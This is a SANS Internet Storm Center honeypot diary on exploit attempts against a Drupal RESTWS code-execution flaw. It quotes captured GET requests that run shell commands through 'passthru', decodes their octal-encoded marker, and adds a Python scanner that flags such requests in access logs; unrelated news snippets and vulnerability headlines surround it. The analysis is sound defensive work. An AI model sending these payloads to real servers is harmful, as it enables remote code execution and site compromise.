(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

For many science journalists, a week would not be complete without one or more trips to the Eurekalert website. Put together by the American Association for the Advancement of Science, Eurekalert is one-stop-shopping for press releases about the latest scientific findings, aggregating material provided by scientific journals, research institutions, and more.

If you're an established science journalist, you can also sign up for access to news before it's news. Log in with the right credentials, and you can see press releases and, in many cases, entire research papers up to a week before they're unleashed on the public. You just have to agree to never publish anything about the work until a specific date and time—the information is under an embargo until then.

Late Tuesday night, however, access to the site vanished, replaced by a notice that the site had been hacked and that the hackers had started leaking embargoed press releases. Only two releases made it out before access was pulled, and if those are anything to go on, the hackers have absolutely no sense of what makes for cutting-edge science.


 

Add former US Secretary of State Colin Powell to the list of high-ranking Washington insiders whose leaked e-mails are rankling their peers with just weeks to go before the US presidential election.

DC Leaks, a site that researchers at security firm ThreatConnect have linked to the Russian government, has published 26 months of Powell's e-mails, spanning from June 2014 to last month, news organizations reported Wednesday. The trove, which contains highly candid comments lambasting presidential candidates Donald Trump and Hillary Clinton, is part of a new batch that's separate from Powell e-mails leaked a few years ago. Powell aides reportedly confirmed the new compromise, telling The New York Times that the leaked messages "are his e-mails."

In the e-mails, Powell describes Trump as a "national disgrace" and portrays the candidate as someone who is unfit to be president.


 
[SECURITY] [DSA 3666-1] mysql-5.5 security update
 
APPLE-SA-2016-09-14-1 iOS 10.0.1
 
LibTIFF CVE-2016-3945 Arbitrary Command Execution Vulnerability
 
LibTIFF CVE-2015-8665 Out Of Bounds Read Denial of Service Vulnerability
 
SAP HANA Information Disclosure Vulnerability
 

Attackers usually don't have to worry much about Drupal administrators applying patches. The majority of exploit attempts I see in our honeypots use pretty ancient vulnerabilities. So I was happy to see a script kiddie go the extra mile and use a vulnerability released in July of this year [1] [2].

The vulnerability itself is very straightforward. The attacker can send arbitrary PHP code that will be executed on the server. No special encoding beyond URL encoding appears to be required.

Here is the exploit string as found in my logs:

GET /?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+

Decoding this leads to:

printf\040\047\134\060\066\061\134\061\060\065\134\061\061\066\134\061\061\062\134\061\061\066\134\061\062\060\134\061\060\062\134\061\062\065\134\061\066\062\134\061\062\063\047|sh

which is itself double octal encoded and, once run, just prints the string 1ENJNPBUrS, likely a marker used to identify vulnerable systems.

So far in our honeypot, I got 44 attempts today from 16 different IPs. Exploit attempts go back to July, just after the vulnerability was announced. Earlier versions use a slightly different test:

GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1

So they skip the octal/URL encoding part.
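Added example, not code from the diary: a small Python scanner that pulls RESTWS passthru requests out of a web access log, undoes the URL encoding, peels the octal layers the way the decoding above does, recovers the marker string, and tallies attempts per source IP. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the diary). The two request
# paths copy the exploit variants quoted above; the third line is normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Sep/2016:10:01:02 +0000] "GET /?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+ HTTP/1.1" 200 512
203.0.113.9 - - [14/Sep/2016:10:05:44 +0000] "GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1" 200 12
203.0.113.5 - - [14/Sep/2016:10:06:01 +0000] "GET /?q=node/12 HTTP/1.1" 200 8192
"""

# Path shape from the diary: taxonomy_vocabulary/<anything>/passthru/<command>
RESTWS_PASSTHRU = re.compile(r"q=taxonomy_vocabulary/[^/\s]*/passthru/(\S+)")
OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")
SINGLE_QUOTED = re.compile(r"'([^']*)'")

def decode_octal_layers(command, max_layers=4):
    """Expand printf-style \\ooo escapes until nothing changes; the diary's
    payload needs two passes (outer printf emits a second, still-escaped printf)."""
    layers = [command]
    for _ in range(max_layers):
        expanded = OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), layers[-1])
        if expanded == layers[-1]:
            break
        layers.append(expanded)
    return layers

def extract_marker(decoded):
    """String the probe would print: innermost quoted text, else the last word
    of the first pipeline stage (the 'echo ktKPt14N9p' variant)."""
    quoted = SINGLE_QUOTED.findall(decoded)
    return quoted[-1] if quoted else decoded.split("|")[0].split()[-1]

def scan_access_log(text):
    """One finding per RESTWS passthru request; decodes the command for triage."""
    findings = []
    for line in text.splitlines():
        m = RESTWS_PASSTHRU.search(line)
        if not m:
            continue
        raw = unquote_plus(m.group(1)).strip()  # undo URL encoding, '+' -> space
        layers = decode_octal_layers(raw)
        findings.append({"ip": line.split()[0], "command": raw,
                         "decoded": layers[-1], "layers": len(layers) - 1,
                         "marker": extract_marker(layers[-1])})
    return findings

def summarize(findings):
    """Attempt count and distinct source IPs, the tally the diary reports."""
    return len(findings), len({f["ip"] for f in findings})
```

Run scan_access_log over your own access log text; each finding carries the decoded command and the number of octal layers peeled off, so new encoding variants stand out at a glance.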

I used Bing's IP address search to check some of the IP addresses attacking the honeypot (for example, try a Bing search for ip:117.240.207.43, but don't click on the result; the site is likely compromised). Most of the IPs appear to be running Drupal sites and are likely exploited and used to scan for more victims.

In my quick sampling, I didn't find any obvious malicious content on these sites. I would have expected some advertisement or maybe even malware, but maybe they are still building out their network.

[1] https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution
[2] https://www.drupal.org/node/2765567

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 
Microsoft ASP.NET Core MVC Multiple Privilege Escalation Vulnerabilities
 
Multiple Cisco Products CVE-2015-6358 Man in the Middle Information Disclosure Vulnerability
 
Multiple VMware Workstation Products CVE-2016-7086 Remote Code Execution Vulnerability
 